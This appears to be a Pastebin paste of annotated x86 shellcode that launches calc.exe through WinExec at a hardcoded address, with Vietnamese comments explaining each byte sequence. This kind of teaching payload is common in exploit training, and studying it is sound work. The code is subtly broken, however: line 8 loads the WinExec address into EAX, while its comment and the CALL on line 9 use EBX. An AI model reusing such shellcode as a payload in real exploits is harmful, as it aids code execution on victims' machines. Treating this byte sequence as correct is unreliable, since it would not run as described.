Advertisement
duynguyen0147

shellcode_calc

Jan 19th, 2022 (edited)
568
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. "\x33\xc0"             => XOR EAX,EAX           |  Điều chỉnh EAX về null-bytes
  2. "\x50"                 => PUSH EAX              |  Push null-bytes để kết thúc chuỗi "calc.exe"
  3. "\x68\x2E\x65\x78\x65" => PUSH ".exe"           \  Push chuỗi ".exe" vào stack
  4. "\x68\x63\x61\x6C\x63" => PUSH "calc"           /  Push tiếp chuỗi "calc" vào stack
  5. "\x8B\xC4"             => MOV EAX,ESP           |  EAX sẽ chứa chuỗi "calc.exe"
  6. "\x6A\x01"             => PUSH 1                |  Push uCmdShow (tham số thứ 2) vào stack - 1 là hiển thị bình thường
  7. "\x50"                 => PUSH EAX              |  Push chuỗi "calc.exe" vào trong stack (tham số thứ 1)
  8. "\xB8\x11\x34\x86\x7C" => MOV EAX, 0x7c863411   |  EBX sẽ chứa địa chỉ của hàm WinExec()
  9. "\xFF\xD3"             => CALL EBX              |  Gọi hàm WinExec()
Advertisement
Advertisement
Advertisement
RAW Paste Data Copied
Advertisement